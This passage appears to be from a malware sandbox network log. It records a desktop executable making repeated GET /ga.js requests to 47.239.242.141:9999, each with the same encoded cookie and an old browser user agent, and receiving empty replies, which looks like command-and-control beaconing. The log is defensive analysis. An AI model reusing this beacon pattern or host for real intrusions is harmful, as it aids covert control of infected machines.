Oct 8, 2024 04:20:29.227272987 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:30.151227951 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	54226	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:30.272250891 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:31.172035933 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	54235	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:31.295429945 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:33.033373117 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:32 GMT Content-Type: application/octet-stream Content-Length: 0
Oct 8, 2024 04:20:33.033477068 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:32 GMT Content-Type: application/octet-stream Content-Length: 0
Oct 8, 2024 04:20:33.033521891 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	54241	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:33.149013996 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:34.066191912 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	54249	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:34.178838015 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:35.119440079 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	54255	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:35.240993023 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:36.157541037 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	54264	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:36.270685911 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:37.248905897 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	54271	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:37.364061117 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:38.252597094 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	54278	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:38.364214897 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:39.286218882 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	54287	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:39.396574020 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:40.310410976 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	54295	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:40.426351070 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:41.338881969 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	54301	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:41.457995892 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:42.353708982 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	54310	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:42.473335028 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:43.404686928 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	54318	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:43.520415068 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:44.437933922 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	54319	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:44.610392094 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:45.498665094 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	54320	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:45.616106987 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:46.553930998 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	54321	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:46.677090883 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:47.566606045 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	54322	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:47.679522038 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:48.571050882 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	54323	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:48.692610025 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:49.615943909 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	54324	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:49.744889021 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:50.690726042 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	54325	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:50.802128077 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:51.704575062 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	54326	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:51.819643974 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:52.708815098 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	54327	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:52.817348003 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:53.733972073 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	54328	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:53.849035978 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:54.761821985 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	54329	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:54.885085106 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:55.797046900 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	54330	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:56.105184078 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:57.012485027 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	54331	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:57.130069971 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:58.043200970 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	54332	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:58.161453009 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:59.053307056 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	54333	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
